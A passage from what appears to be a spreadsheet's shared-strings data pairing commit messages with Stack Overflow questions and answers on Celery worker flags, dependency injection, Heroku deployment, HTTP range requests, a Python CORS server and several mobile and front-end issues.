Disconnected (code: 1005, reason: &amp;quot;&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Browser terminal:
&lt;a href="https://i.sstatic.net/xFFEx3oi.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/xFFEx3oi.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/4a1t6OzL.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/4a1t6OzL.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C198</t>
  </si>
  <si>
    <t>fix listings search
architecture change: base html now changed to base_template for all apps.
Reason https://stackoverflow.com/questions/9633387/django-using-blocks-in-included-templates</t>
  </si>
  <si>
    <t>Django does not process blocks in included files.
The include tag should be considered as an implementation of "render this subtemplate and include the HTML", not as "parse this subtemplate and include its contents as if it were part of the parent". This means that there is no shared state between included templates -- each include is a completely independent rendering process. (
Django template tag documentation
)</t>
  </si>
  <si>
    <t xml:space="preserve">Enterprise Architect has a way to generate the documentation in HTML/RTF/etc. that you could publish, but you have to use its GUI to do that manually. When you have your *.eap files in a CVS/Subversion server, it would be useful to have a script that would check out daily the latest version and publish it in a web server. As long as I know, EA doesn't have a command line utility for this purpose. I found that you can automate almost anything using its COM interface, but that means it's necessary to write a small program to do that. Any ideas about the easiest/cleanest way to do that (without having to write code, if possible)?
</t>
  </si>
  <si>
    <t>C199</t>
  </si>
  <si>
    <t>Change to "Clean Architecture", Use DI to access services
The ApplicationCore project will contain ALL interfaces from now on, will contain in the future the DB entities.
All services will be injected for whoever wants them.
This is important for enabling Logging using the built-in logging framework in ASP.Net Core.
Based on:
https://stackoverflow.com/questions/9501604/ioc-di-why-do-i-have-to-reference-all-layers-assemblies-in-applications-entry</t>
  </si>
  <si>
    <t>If I wasn't using a DI container, I wouldn't have to reference EntityFramework library in my MVC3 app, only my business layer which would reference my DAL/Repo layer.
Yes, that's exactly the situation DI works so hard to avoid :)
With tightly coupled code, each library may only have a few references, but these again have other references, creating a deep graph of dependencies, like this:
Because the dependency graph is deep, it means that most libraries drag along a lot of other dependencies - e.g. in the diagram,
Library C
drags along
Library H, Library E, Library J, Library M, Library K
and
Library N
. This makes it harder to reuse each library independently from the rest - for example
in unit testing
.
However, in a loosely coupled application, by moving all the references to the
Composition Root
, the
dependency graph is severely flattened
:
As illustrated by the green color, it's now possible to reuse
Library C
without dragging along any unwanted dependencies.
However, all that said, with many DI Containers, you don't
have
to add hard references to all required libraries. Instead, you can use
late binding
either in the form of convention-based assembly-scanning (preferred) or XML configuration.
When you do that, however, you must remember to copy the assemblies to the application's bin folder, because that no longer happens automatically. Personally, I rarely find it worth that extra effort.
A more elaborate version of this answer can be found in
this excerpt
from my book
Dependency Injection, Principles, Practices, Patterns
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have implemented &lt;a href="https://pub.dev/packages/flutter_callkit_incoming" rel="nofollow noreferrer"&gt;flutter_callkit_incoming&lt;/a&gt; for call and i have an issue while receiving the viop notification in ios background. According to the apple official documentation On iOS 13.0 and later, if you fail to report a call to CallKit, the system will terminate your app. Repeatedly failing to report calls may cause the system to stop delivering any more VoIP push notifications to your app. If you want to initiate a VoIP call without using CallKit, register for push notifications using the User Notifications framework instead of PushKit.
So the call notification is no received in iOS 13 and later.
Did any one resolved this issue ?&lt;/p&gt;
&lt;p&gt;I have added all the files and functions according to the plugin official documentation. Still not working&lt;/p&gt;
&lt;p&gt;I am adding the payload&lt;/p&gt;
&lt;p&gt;payload :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
   notification: { title: 'New Alert', body: '@H is calling you...' },
   android: {
     notification: {
       channelId: 'channel_id',
       sound: 'sound_name.mp3'
     }
   },
   apns: { payload: { aps: [Object] } },
   data: {
     title: 'New Call',
     body: '@H is calling you...',
     notificationType: 'CALL',
     type: 'NOTIFICATION',
     sound: 'sound_name'
   },
   token: 'token'
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and i have followed &lt;a href="https://github.com/hiennguyen92/flutter_callkit_incoming?tab=readme-ov-file#-installation" rel="nofollow noreferrer"&gt;https://github.com/hiennguyen92/flutter_callkit_incoming?tab=readme-ov-file#-installation&lt;/a&gt;&lt;br /&gt;
this installation process.&lt;/p&gt;
&lt;p&gt;I should get call notification  when app is in background or in kill state but the voip notification some times get lost and does not deliver&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C2</t>
  </si>
  <si>
    <t>celery worker --without-gossip --without-mingle because `--pool sol
o` fails to communicate heartbeats correctly and is spammig logs
See also for reference:
- https://stackoverflow.com/questions/21132240/celery-missed-heartbeat-on-node-lost
- https://stackoverflow.com/questions/55249197/what-are-the-consequences-of-disabling-gossip-mingle-and-heartbeat-for-celery-w
- https://stackoverflow.com/questions/66978028/application-impacts-of-celery-workers-running-with-the-without-heartbeat-fla</t>
  </si>
  <si>
    <t>Celery 3.1 added in the new mingle and gossip procedures. I too was getting a ton of missed heartbeats and passing --without-gossip to my workers cleared it up.
https://docs.celeryproject.org/en/3.1/whatsnew-3.1.html#mingle-worker-synchronization
Mingle: Worker synchronization
The worker will now attempt to synchronize with other workers in the same cluster.
Synchronized data currently includes revoked tasks and logical clock.
This only happens at startup and causes a one second startup delay to collect broadcast responses from other workers.
You can disable this bootstep using the --without-mingle argument.
https://docs.celeryproject.org/en/3.1/whatsnew-3.1.html#gossip-worker-worker-communication
Gossip: Worker &lt;-&gt; Worker communication
Workers are now passively subscribing to worker related events like heartbeats.
This means that a worker knows what other workers are doing and can detect if they go offline. Currently this is only used for clock synchronization, but there are many possibilities for future additions and you can write extensions that take advantage of this already.
Some ideas include consensus protocols, reroute task to best worker (based on resource usage or data locality) or restarting workers when they crash.
We believe that although this is a small addition, it opens amazing possibilities.
You can disable this bootstep using the --without-gossip argument.</t>
  </si>
  <si>
    <t>So this is the explanation of the heartbeat mechanism. Now since AMQP uses TCP the celery workers will try to reconnect if they can't establish a connection or whenever the TCP protocol dictates. So it looks like the heartbeat mechanism is not needed. But it as a few advantages :
It doesn't rely on the broker protocol, so if the broker have some internal issues or uses UDP the worker will still know if events are not received, and will be able to act accordingly
The heartbeat mechanism checks that events are sent and received which is a much greater indicator that the app is running as expected. If for example the broker doesn't have enough space and is starting to drop events, the worker will have an indication for that with the heartbeat mechanism. And if the worker is using multiple brokers, it can also decide to connect to another broker which should be less busy.
NOTE: regarding "[heartbeat] does not rely on the broker protocol... or uses UDP":
Given that celery supports multiple brokers and may use UDP, celery wants to guarantee the connection to the broker even if your broker protocol uses UDP --&gt; so the only way for celery to guarantee that connection when the broker protocol uses UDP is to implement your own application level heartbeats.</t>
  </si>
  <si>
    <t>This is the base documentation which doesn't give us much info
heartbeat
Is related to communication between the worker and the broker (in your case the broker is CloudAMQP). See explanation
With the --without-heartbeat the worker won't send heartbeat events
mingle
It only asks for "logical clocks" and "revoked tasks" from other workers on startup.
Taken from whatsnew-3.1
The worker will now attempt to synchronize with other workers in the same cluster.
Synchronized data currently includes revoked tasks and logical clock.
This only happens at startup and causes a one second startup delay to collect broadcast responses from other workers.
You can disable this bootstep using the --without-mingle argument.
Also see docs
gossip
Workers send events to all other workers and this is currently used for "clock synchronization", but it's also possible to write your own handlers on events, such as on_node_join, See docs
Taken from whatsnew-3.1
Workers are now passively subscribing to worker related events like heartbeats.
This means that a worker knows what other workers are doing and can detect if they go offline. Currently this is only used for clock synchronization, but there are many possibilities for future additions and you can write extensions that take advantage of this already.
Some ideas include consensus protocols, reroute task to best worker (based on resource usage or data locality) or restarting workers when they crash.
We believe that although this is a small addition, it opens amazing possibilities.
You can disable this bootstep using the --without-gossip argument.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following code&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;from cryptography.fernet import Fernet
encryption_key=&amp;quot;....&amp;quot;
fernet_instance = Fernet(encryption_key)
encoded_value = fernet_instance.encrypt(&amp;quot;some text&amp;quot;).decode()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is &lt;code&gt;Fernet&lt;/code&gt; implementation thread safe? can I use the same instance to concurrently encrypt different strings in different threads?&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I think that business logic should exist in a model when using an MVC or MVP design pattern, but should be hidden behind a service in a service-oriented architecture.
Can a software system use the MVC or MVP design pattern within a service-oriented architecture? If so, where does the model sit?
</t>
  </si>
  <si>
    <t xml:space="preserve">I've got a service that has a very slow memory leak.  If I analyze the .NET CLR Loading counters, I see that the Current Classes Loaded counter is constantly increasing and matches Total Classes Loaded counter at all times.  This gives me the impression that the memory leak is related to resources not being freed (This is just a guess).
The service creates new appDomains each time it performs a task (plug-in architecture).
I need to figure out the class names so I can narrow down the cause of the leak.  I'm not very proficient with WinDbg, but I was wondering if anyone could walk me through the steps to enumerate these Loaded classes.
I do have the source code so I can obtain the symbol files if necessary.  Thanks in advance for any help!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to setup a kubernetes cluster using the TalosOS and the &lt;code&gt;talosctl&lt;/code&gt; command.
I created the &lt;code&gt;talosconfig&lt;/code&gt; file and used it to apply the &lt;code&gt;controlplane&lt;/code&gt; config to my virtual machine I created on Proxmox.&lt;/p&gt;
&lt;p&gt;I am stuck now because I always get a &lt;code&gt;connection refused&lt;/code&gt; error and I can't find any hints on the internet what the problem might be.&lt;/p&gt;
&lt;p&gt;Does anybody has a recommendation how to proceed?&lt;/p&gt;
&lt;p&gt;Manuel&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/TrRLFGJj.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/TrRLFGJj.png" alt="Talos LOG" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here you can see the health report:
&lt;a href="https://i.sstatic.net/82IgZoUT.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/82IgZoUT.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm building a framework and want developers who build with it to have the ability to allow parts of it to both share data with other sites and allow other sites to add/edit/delete data.
For example, if someone makes a site that has book reviews, authors, quotes, code examples, comments, etc. the developer could make e.g. "book reviews" read-only for other sites and "comments" readable by other sites and writable by certain sites/users. The idea is to use the framework to build applications that can easily be interconnected with other applications.
I envision enabling all interaction with the site via POST and GET which would look something like this:
/books.php?category=ruby (returns an XML collection of books about ruby)
/books.php?id=23 (returns the XML for a specific book)
/books.php?action=add&amp;title=AdvancedRuby&amp;description=....&amp;securityId=923847203487
/books.php?action=delete&amp;id=342&amp;securityId=923847203487
Other applications could also "discover and consume" what a certain site has to offer by doing this:
/discover.php (returns XML of all public classes and actions available)
Really this is all I need to enable the framework to be a way for developers to quickly create loosely connected sites.
What I want to know is, before I begin implementing this, are there significant/interesting parts of REST that I do not yet understand which I should be building into the framework, e.g.:
REST requires GET, POST, PUT and DELETE. Why would I ever need "PUT" and "DELETE"? Am I locking myself out from taking advantage of some standard if I dont' use these?
My "discover.php" file functions similarly to a WSDL file in web services. I am surprised in descriptions of REST there seems to be no standardized way of discovering the services that a RESTful service offers, or is there?
If a client website tries to e.g. add a book to a server website and does not get any "success" response back, it would simply try again until it got a response. The server website would simply not add the same book twice. This is my understanding of data integrity in REST, is there more to it than this?
eventually I want to have multiple sites that have the same rich classes e.g. "BookReview" so that a client site would be able to execute code such as this:
$bookReview = new BookReview("[external-link]");
$book-&gt;informAuthor("a comment about your book review was posted on our site...");
and the server site would send an e-mail off to the author of that review.
Is this type of type interaction a component of the RESTful philosophy or is REST simply the exchange of data via XML, JSON?
</t>
  </si>
  <si>
    <t xml:space="preserve">Imagine having the following scenario:
You need to create a system where the Back end is seperate from the Front end, which is always important when programming, of course. But What if you want to be able to change the back end completely without changing the front end?
When creating a big website for instance, I'd go with the following projects:
Data - Handles all the data connections, the i.e. LINQ generated files and other partial overrides.
Interfaces - This layer is interesting, is this an overflow? Having the interfaces separated is because, the Business logic and the Data layer might have a lot of Interfaces in common and instead of Referencing the Data Layer from the Front, you can reference the Interface Layer and then have the Business Logic sending you an interface, instead of knowing about the correct classes and structure of the Data Objects in the Data Layer.
Business Logic - This speaks for itself, the business logic for the application.
Front End - Web, GUI or whatever is needed, code-wise of course.
My question is really, is this an overflow of layers and thinking? Is maybe the Interface Layer unimportant? Suggestions?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I modify my code to get biphasic pulses with 1 us long pulses and 1 us long pauses between each pulse. What ever I try, I am not able to generate such short pulses.. I managed to make it in Matlab but in Python I can't seem to make it work. Can someone help please?&lt;/p&gt;
&lt;p&gt;MAIN PROBLEM: I need to have code where I can set my own duration of pulse and pause (which are 1 us - 0.1 ms). Right now my code is giving me too long pulses and I can't directly set for instance pulse_width=0.001 and break_width=0.001.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pointCount = 5000
voltages = np.empty(pointCount)
times = np.arange(pointCount) * 0.05
# Stimulus:
stim = np.zeros(pointCount)
amplitude = 1  # Pulse amplitude
num_pulses = 400  # Number of biphasic pulses
pulse_width = 2   # Width of each pulse (samples)
break_width = 2   # Break duration (samples)
start_index = 1200  # Start of first pulse
# Generate 50 biphasic pulses
for i in range(num_pulses):
    index = start_index + i * (2 * pulse_width + 2 * break_width)  # Calculate start index for each pulse pair
    stim[index:index + pulse_width] = amplitude    # Positive pulse
    stim[index + pulse_width + break_width:index + 2 * pulse_width + break_width] = -amplitude  # Negative pulse
plt.figure()
plt.plot(times, stim, 'r')
plt.xlabel('Time (ms)')
plt.ylabel('Amplitude (mV)')
plt.show()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/FWfjKIVo.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/FWfjKIVo.png" alt="How pulses should look like with 1us duration" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">New to silverlight.  Traditionally if I were to design a wizard-like process where a user had to go through 3 or 4 steps, I'd have each step as a separate aspx page.  Using silverlight,  would you do it all in one component, or would you have 3 separate pages each with a different silverlight component?  What kind of advantages/disadvantages are there for either approach?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I try to retrieve data from a server database (running with Flask) using the fetch function in a React Native script.
I separated the fetch and the recovery as an JS object in a function. Data are jsonized in flask and decrypted in the fetch.then method (see code below).&lt;/p&gt;
&lt;p&gt;My problem: I got an issue back after the fetch function like i can't get the content and the log display is swapped:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The console log displays first the log after the function and then the inner function log.&lt;/li&gt;
&lt;li&gt;the fetch is not returned from the fetch function. It's empty or delayed: {&amp;quot;_h&amp;quot;: 0, &amp;quot;_i&amp;quot;: 0, &amp;quot;_j&amp;quot;: null, &amp;quot;_k&amp;quot;: null}&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;JS Function along App.js in a separated Request.js file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export default async function get_posts () {
  const url = &amp;quot;http://192.168.0.12:8085&amp;quot; + &amp;quot;/Posts_to_App&amp;quot;
  const response = await fetch(url, {
      method: &amp;quot;POST&amp;quot;,
      body: JSON.stringify({ &amp;quot;filterParameters&amp;quot;: { &amp;quot;id&amp;quot;: 12345678 } }),
      headers: { &amp;quot;content-type&amp;quot;: &amp;quot;application/json&amp;quot; }
  });
  const obj = await response.json();
  console.log(&amp;quot;obj: &amp;quot;)
  console.log(obj)
  return obj
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;React SCREEN (native code) in App.js:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const PostScreen = () =&amp;gt; {
  var posts = get_posts();
  const navigation = useNavigation();
  const [tags, setTags] = useState([]);
  const [text, setText] = useState('');
  console.log(&amp;quot;return: &amp;quot;)
  console.log(posts)
  console.log(&amp;quot;returned: &amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Flask server:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;posts: {&amp;quot;0&amp;quot;: [9, 1, &amp;quot;2025-01-31 13:59:03&amp;quot;, &amp;quot;BOB&amp;quot;, &amp;quot;NICO&amp;quot;, &amp;quot;KENNEDY&amp;quot;, &amp;quot;Post 1 txt&amp;quot;, 2, 456], &amp;quot;1&amp;quot;: [27, 1, &amp;quot;2025-02-04 20:27:50&amp;quot;, &amp;quot;Luck&amp;quot;, &amp;quot;Joel&amp;quot;, &amp;quot;Siva&amp;quot;, &amp;quot;Post 2 txt&amp;quot;, &amp;quot;MACHINES&amp;quot;, 89]}
192.168.0.12 - - [19/Feb/2025 20:54:56] &amp;quot;POST /Posts_to_App HTTP/1.1&amp;quot; 200 -
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Expo log (synchronized with Android studio):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; (NOBRIDGE) LOG  return:
 (NOBRIDGE) LOG  {&amp;quot;_h&amp;quot;: 0, &amp;quot;_i&amp;quot;: 0, &amp;quot;_j&amp;quot;: null, &amp;quot;_k&amp;quot;: null}
 (NOBRIDGE) LOG  returned:
 (NOBRIDGE) LOG  obj:
 (NOBRIDGE) LOG  {&amp;quot;0&amp;quot;: [9, 1, &amp;quot;2025-01-31 13:59:03&amp;quot;, &amp;quot;BOB&amp;quot;, &amp;quot;NICO&amp;quot;, &amp;quot;KENNEDY&amp;quot;, &amp;quot;Post 1 txt&amp;quot;, 2, 456], &amp;quot;1&amp;quot;: [27, 1, &amp;quot;2025-02-04 20:27:50&amp;quot;, &amp;quot;Luck&amp;quot;, &amp;quot;Joel&amp;quot;, &amp;quot;Siva&amp;quot;, &amp;quot;Post 2 txt&amp;quot;, &amp;quot;MACHINES&amp;quot;, 89]}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a &lt;a href="https://getbootstrap.com/docs/5.3/components/modal/" rel="nofollow noreferrer"&gt;Bootstrap 5.3 modal&lt;/a&gt; as a preloader when a user submits a form in my multiâ€‘page application. The modal shows while waiting for the server response and then the user is taken to a new page. However, when the user clicks the browserâ€™s back button to return to the form page, the modal is still visibleâ€”even though it should be hidden.&lt;/p&gt;
&lt;p&gt;The modal has the &lt;code&gt;fade&lt;/code&gt; class, so I assume there may be a race condition in play here.&lt;/p&gt;
&lt;p&gt;I've tried several approaches (including listening for &lt;code&gt;popstate&lt;/code&gt; and &lt;code&gt;pageshow&lt;/code&gt; events) and handling potential race conditions with the modalâ€™s &lt;code&gt;shown.bs.modal&lt;/code&gt; event.&lt;/p&gt;
&lt;p&gt;I have seen a few similar posts on this subject, but they are either for &lt;a href="https://stackoverflow.com/questions/40314576/bootstrap-3-close-modal-when-pushing-browser-back-button"&gt;older versions of Bootstrap&lt;/a&gt;, rely on jQuery, or involve &lt;a href="https://stackoverflow.com/questions/27398638/how-to-hide-a-bootstrap-modal-on-the-previous-page-if-user-comes-in-clicking-bac"&gt;disabling the first page's cache&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Example Code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ... form validation code here
// Define the modal element
const modalEl = document.getElementById( &amp;quot;processingModal&amp;quot; );
// Create a new modal instance in Bootstrap
const modalInstance = new bootstrap.Modal( this.modalEl, {
    backdrop: 'static',
    focus: true,
    keyboard: false
} );
// show the modal, letting the user know the form is processing
modalInstance.show();
// ... submit the form
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been spending some time looking at Phil Haack's article on [external-link] very interesting stuff.
At the moment I'm trying to figure out if it would be possible to use the same ideas to create a plug-in/modular architecture for a project I'm working on.
So my question is: Is it possible to have the Areas in Phil's article split across multiple projects?
I can see that the name spaces will work themselves out, but I'm concerned about the views ending up in the right place. Is it something that can be sorted out with build rules?
Assuming that the above is possible with multiple projects in a single solution, does anyone have any ideas about the best way to make it possible with a separate solution and coding to a predefined set of interfaces? Moving from an Area to a plug-in.
I have some experiences with plug-in architecture but not masses so any guidance in this area would be useful.
</t>
  </si>
  <si>
    <t>C20</t>
  </si>
  <si>
    <t>Update index.htm
--------------------------------Explaing the audio changes-------------------------------------------------
In mobile browsers autoplay doesn't work for the audio and video tag due to mobile charges. The only way to start playing audio is if the user initiates it either through a button click or something like that.
Read more here: http://stackoverflow.com/a/26066844
So I made some changes that detect the user agent to see if its a mobile browser or not (see script afunction(); on line 152). If it detects that the user is using a mobile browser, it replaces the inner html with material design lite (Google's version of material design for the web), and two button, and text that states, "Prepare Your Wallet". One button (the one that uses material design) says "KKKK" which, onclick, goes to a function called WalletPrepared() (line 62). That function starts playing the audio and makes an attribute that says, onload of a random picture (line 75) to initiate WalletPrepared2() (line 109). The reason I chose, onload of a random picture, is because, I don't know how to execute another Javascript from another Javascript (I'm a newb). Anyway, what WalletPrepared2() does is, replace all of the inner html with your code. Thus, seeing lord Gaben making a bunch of deals on Steam.
But, if the user clicks the No button, on the prompt, it will goto WalletNotPrepared() (line 42). That replace the text, "Prepare your wallet" with "Um, I don't think you heard me. I said, Prepare Your Wallet!!!!!!!!!!!!!". It also removes the No button. And when the user clicks KKKK it will goto the script on line 62 and I just explained what it does above.</t>
  </si>
  <si>
    <t>This question has been answered in other places before.
Regarding Apple devices specifically:
Can you autoplay HTML5 videos on the iPad?
"Apple has made the decision to disable the automatic playing of video on iOS devices, through both script and attribute implementations.  In Safari, on iOS (for all devices, including iPad), where the user may be on a cellular network and be charged per data unit, preload and auto-play are disabled. No data is loaded until the user initiates it."
Safari HTML5 Audio and Video Guide - iOS-Specific Considerations
"In Safari on iOS (for all devices, including iPad), where the user may be on a cellular network and be charged per data unit, preload and autoplay are disabled. No data is loaded until the user initiates it. This means the JavaScript play() and load() methods are also inactive until the user initiates playback, unless the play() or load() method is triggered by user action. In other words, a user-initiated Play button works, but an onLoad="play()" event does not."
Googling will reveal more.
I have read in a few places that Chrome on Android also behaves this way, though other Android browsers may not.
How this applies to your case specifically:
Normally, just clicking on a link would work fine if the player were in the same page, since the click on that link would be counted as valid user interaction to start the media playback.  But, you're loading a new page, which resets this check for user interaction, and so media will not start until the user interacted with the new page in some way.
Thus, the user has to scroll, touch, tap, swipe, or something, in order to auto play, or just hit the play button on the media player.</t>
  </si>
  <si>
    <t xml:space="preserve">Did you ever have to choose between WISA or LAMP at the beginning of a web project?
While pros and cons are littered around the net, it would be helpful to know about your real experience in coming up w/ criteria, evaluating, deciding, and reflecting upon your decision to go w/ either platform.
</t>
  </si>
  <si>
    <t>C200</t>
  </si>
  <si>
    <t>Deploy to Heroku (#4)
A couple things I'm doing for the first time:
- Deploy a full-stack app with `client/` `server/` directory structure &amp; two package.jsons to Heroku
  - Solution: Use `heroku-postbuild` from a top-level package.json and reference the nested package.jsons in it
- Build TypeScript in a Heroku project
  - Solution: Add build command to the above-mentioned heroku-postbuild step (Would it make more sense to move these to a `npm run build` script instead?)
----
I encountered one other hicup: Build failed -- had to move some `devDependencies` to `dependencies` as mentioned in a few places e.g. angular/angular-cli#7550.
Deploying a full-stack Node app to Heroku
https://stackoverflow.com/questions/47124869/deploying-a-full-stack-node-app-npm-package-json-architecture</t>
  </si>
  <si>
    <t>You can use heroku-postbuild and maintain separate package.json files for your client and server in a single git repo that you push to Heroku.
For example, in one of my projects, the directory structure looks like this:
|-- package.json (for node/express server)
|-- Procfile
|-- www
    |--client
       |-- package.json (for Ionic/Angular client app)
       |-- ...
    |--server
       |--- ...
    |-- server.js (top level node.js/express script for server)
In my top-level package.json, I have:
"scripts": {
    "start": "node www/server.js",
    "heroku-postbuild": "cd www/client &amp;&amp; npm install &amp;&amp; npm run build"
 },
In my client package.json I have:
 "scripts": {
    "build": "ionic-app-scripts build",
    ...
 },
And finally in my Procfile I have:
web: npm start
With this solution, Heroku runs my server and builds my client code on every Heroku build.
I think client and server package.jsons should be kept separate for several reasons. For one thing, you really don't want all your server-side code bundled into your client.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a product with an install base of about 50, over 50% of these installs have customizations in the code for the business logic, and that is currently done by huge IF and Switch statements. 
We are currently in the process of updating the code to .NET 3.5 and would like to handle the customizations in a more managable way. The only ways we can think of at the moment are to either stick with the large IF and Switch statements or have seperate files within Source Code Control for each client, which again doesn't seem to be ideal.
Is there an accepted way of handling large numbers of customizations across a codebase?
</t>
  </si>
  <si>
    <t>C201</t>
  </si>
  <si>
    <t>Replaced the mediasrv.py SimpleHttp server by flask and waitress,
fixing HTML5 media support.
https://stackoverflow.com/questions/37044064/html-audio-cant-set-currenttime
https://stackoverflow.com/questions/21956683/enable-access-control-on-simple-http-server
https://stackoverflow.com/questions/5052635/what-is-relation-between-content-length-and-byte-ranges-in-http-1-1
https://stackoverflow.com/questions/16725907/google-app-engine-serving-mp3-for-audio-element-needs-content-range-header
I was trying to use HTML5 audio tag to display audios like:
```html
&lt;audio id="elem_audio" src="myfile.mp3" controls&gt;&lt;/audio&gt;
```
![image](https://user-images.githubusercontent.com/5332158/79063321-565b5500-7c77-11ea-9f8d-6e1df6f07892.png)
But the progress bar seek was not working. After researching, I found the problem was the HTML server not properly responding to the HTML5 header requests. The HTML server should respond to quite complicated things as 206 partial, properly handle keep-alive, provide media ranges and other HTTP headers: https://stackoverflow.com/questions/37044064/html-audio-cant-set-currenttime</t>
  </si>
  <si>
    <t>Check your HTTP server configuration, in my testing environment ( Chrome 69 on Mac OS) setting currentTime property of audio element works only when the audio source is served by a HTTP server support persistent connection.
If the HTTP server you used support persistent connection, you will found (in Chrome DevTool) the Connection field of response headers of your audio source be keep-alive. By contrast if the audio source is served by a persistent connection incompatible server, there will be no Connection field in response headers.
The status code of your audio source HTTP request will be a reference too, 206 Partial Content for persistent connection supported server, 200 OK for an inferior one.</t>
  </si>
  <si>
    <t>The Content-Length entity-header field indicates the size of the entity-body […] sent to the recipient […]
In a non-multipart message the entity-body is the body of the HTTP message as it only contains one entity. So the Content-Length value indicates the length of the message body that is sent and not the size of the whole resource.
So for a partial content response on a 0-100 byte range request (first byte and last byte inclusive) the Content-Length of the response will be 0 ≤ size ≤ 101.
In case of a 12345 byte long resource the response could look like this:
HTTP/1.1 206 Partial Content
Content-Range: bytes 0-100/12345
Content-Length: 101
… 101 bytes of content …</t>
  </si>
  <si>
    <t>You must send the 206 Partial Content HTTP status.
Include an Accept-Ranges: bytes header.
Include a Content-Range: 0-2048/123456 header where you send the starting and ending byte index of the content followed by the total byte length of the content. The client will be sending you the byte ranges it wants in the request header. The client may send multiple byte ranges in a single request, in which case you'd also need to send the content with multipart word boundaries.
If the client requests a byte range that isn't satisfiable then you must send a 416 HTTP status and close the connection.</t>
  </si>
  <si>
    <t>Unfortunately, the simple HTTP server is really that simple that it does not allow any customization, especially not for the headers it sends. You can however create a simple HTTP server yourself, using most of SimpleHTTPRequestHandler, and just add that desired header.
For that, simply create a file simple-cors-http-server.py (or whatever) and, depending on the Python version you are using, put one of the following codes inside.
Then you can do python simple-cors-http-server.py and it will launch your modified server which will set the CORS header for every response.
With the shebang at the top, make the file executable and put it into your PATH, and you can just run it using simple-cors-http-server.py too.
Python 3 solution
Python 3 uses SimpleHTTPRequestHandler and HTTPServer from the http.server module to run the server:
#!/usr/bin/env python3
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
import sys
class CORSRequestHandler (SimpleHTTPRequestHandler):
    def end_headers (self):
        self.send_header('Access-Control-Allow-Origin', '*')
        SimpleHTTPRequestHandler.end_headers(self)
if __name__ == '__main__':
    test(CORSRequestHandler, HTTPServer, port=int(sys.argv[1]) if len(sys.argv) &gt; 1 else 8000)
Python 2 solution
Python 2 uses SimpleHTTPServer.SimpleHTTPRequestHandler and the BaseHTTPServer module to run the server.
#!/usr/bin/env python2
from SimpleHTTPServer import SimpleHTTPRequestHandler
import BaseHTTPServer
class CORSRequestHandler (SimpleHTTPRequestHandler):
    def end_headers (self):
        self.send_header('Access-Control-Allow-Origin', '*')
        SimpleHTTPRequestHandler.end_headers(self)
if __name__ == '__main__':
    BaseHTTPServer.test(CORSRequestHandler, BaseHTTPServer.HTTPServer)
Python 2 &amp; 3 solution
If you need compatibility for both Python 3 and Python 2, you could use this polyglot script that works in both versions. It first tries to import from the Python 3 locations, and otherwise falls back to Python 2:
#!/usr/bin/env python
try:
    # Python 3
    from http.server import HTTPServer, SimpleHTTPRequestHandler, test as test_orig
    import sys
    def test (*args):
        test_orig(*args, port=int(sys.argv[1]) if len(sys.argv) &gt; 1 else 8000)
except ImportError: # Python 2
    from BaseHTTPServer import HTTPServer, test
    from SimpleHTTPServer import SimpleHTTPRequestHandler
class CORSRequestHandler (SimpleHTTPRequestHandler):
    def end_headers (self):
        self.send_header('Access-Control-Allow-Origin', '*')
        SimpleHTTPRequestHandler.end_headers(self)
if __name__ == '__main__':
    test(CORSRequestHandler, HTTPServer)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;ISSUE:&lt;/strong&gt;
Flutter native splash is showing only the background when launched right after installing with APK (first launch). But when later opened the, the main image and branding is shown. When installing directly from VS Code to physical or virtual device, the logo and the branding is displayed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What I want:&lt;/strong&gt;
When the app is first installed and launched, the splash screen should display a logo in the middle and a branding logo at the bottom.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What I have tried:&lt;/strong&gt;
